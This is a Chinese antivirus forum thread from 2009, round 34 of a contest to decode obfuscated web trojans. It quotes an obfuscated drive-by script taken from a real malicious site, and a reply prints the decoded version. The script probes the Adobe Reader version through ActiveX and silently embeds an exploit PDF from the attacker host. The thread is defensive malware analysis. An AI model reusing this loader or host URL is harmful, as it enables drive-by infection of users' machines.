瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第三十四期(已结束)

1   1  /  1  页   跳转

[悬赏] 网马解密悬赏第三十四期(已结束)

网马解密悬赏第三十四期(已结束)



引用:
http://mashaei.ir/awstats/admin.php



//<script>
nL6=24;if(unescape)nL6='';KqN=unescape('%'+nL6);
var Knpql='doX63umeD6eM74n2ewritX65n28M22X3cdiv stylM65D3dM5cD22X70oX73in74M69on6eX3aaM62soluten3bD20ln65ftX3aD2d10n300n70xM3b topM3aD2d1M3000D70M78D3bD5cX22M3eM22)M3bvar M42D72FD4fM3dX6euln6cX3btrX79n7bX42rFOn3dX6eeD77 Activn65n58Objn65cn74(M22D41cM72X6fPn44F.PD44FX22X29X3bX7dcatcX68M28e)n7bn7dif(X21M42rFOX29X7btn72yM7bBrFOM3dM6eX65wn20ActiveD58Objecn74(X22Pn44F.M50n64M66CX74rln22)X3bn7dcatch(e)D7bD7dM7dD69n66(Brn46OD29n7blvD3d((X42rFO.GetVeM72sioX6es().spn6ciM74(n22X2cD22))D5bD34X5d.sM70litX28X22X3dM22)M29n5b1n5d.M72X65plM61cen28n2fD5c.M2fM67,D22D22)X3bif((X6cvX3c9D300)n26M26(X6cvn21D3dn3813n29)n64oX63umeD6etn2ewriteM28n27X3cembed sn72cD3dM22httpM3aD2fM2fmashaei.M69rM2fD41WStatsM2faD64miX6e.phM70D3fsM3deD58M62X65M4eX59oM26idM3d2M22 widthM3d100 M68eightM3dD3100 tyM70eM3dX22applicatD69M6fn6eM2fX70dn66X22X3eD3cD2fembedX3eM27)X3bX7ddocumM65X6et.write(M22M3cM2fD64D69vn3eM22)D3b';
eval(unescape(Knpql.replace(/[MXDn]/g,KqN)));
//</script>




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:卡卡论坛会员均可参加


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2009-10-22 09:22:16
分享到:
gototop
 

回复: 网马解密悬赏第三十四期



document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");var BrFO=null;try{BrFO=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!BrFO){try{BrFO=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(BrFO){lv=((BrFO.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");if((lv<900)&&(lv!=813))document.write('<embed src="http://mashaei.ir/AWStats/admin.php?s=eXbeNYo&id=2" width=100 height=100 type="application/pdf"></embed>');}document.write("</div>");


本帖被评分 1 次
gototop
 

回复:网马解密悬赏第三十四期

关于:hxxp://mashaei.ir/awstats/admin.php解密的日志(全体输出 -  2):

Level  0>http://mashaei.ir/awstats/admin.php
Level  1>http://mashaei.ir/awstats/admin.php?s=exbenyo&id=2
貌似失效,无法下载读取源码

网页分析:        Baby无齿
本帖被评分 1 次
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT